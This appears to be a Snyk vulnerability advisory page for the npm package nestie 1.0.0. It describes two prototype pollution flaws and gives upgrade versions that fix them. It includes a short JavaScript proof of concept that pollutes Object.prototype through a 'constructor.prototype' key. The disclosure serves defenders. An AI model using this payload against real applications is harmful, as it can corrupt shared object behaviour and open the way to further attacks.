nestie@1.0.0 vulnerabilities

A tiny (215B) and fast utility to expand a flattened object

Direct Vulnerabilities

Known vulnerabilities in the nestie package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Prototype Pollution

nestie is an A tiny (224B) and fast utility to expand a flattened object

Affected versions of this package are vulnerable to Prototype Pollution. A bypass of CVE-2021-25947 is possible which could lead to pollution of the object prototype.

PoC

var { nestie } = require("nestie")
console.log("Before : " + {}.polluted);
nestie({"constructor.prototype.polluted": "Yes! Its Polluted"})
 console.log("After : " + {}.polluted);

How to fix Prototype Pollution?

Upgrade nestie to version 1.0.2 or higher.

<1.0.2
  • M
Prototype Pollution

nestie is an A tiny (224B) and fast utility to expand a flattened object

Affected versions of this package are vulnerable to Prototype Pollution in nestie() function due to lack of validation of glue input parameter.

How to fix Prototype Pollution?

Upgrade nestie to version 1.0.1 or higher.

<1.0.1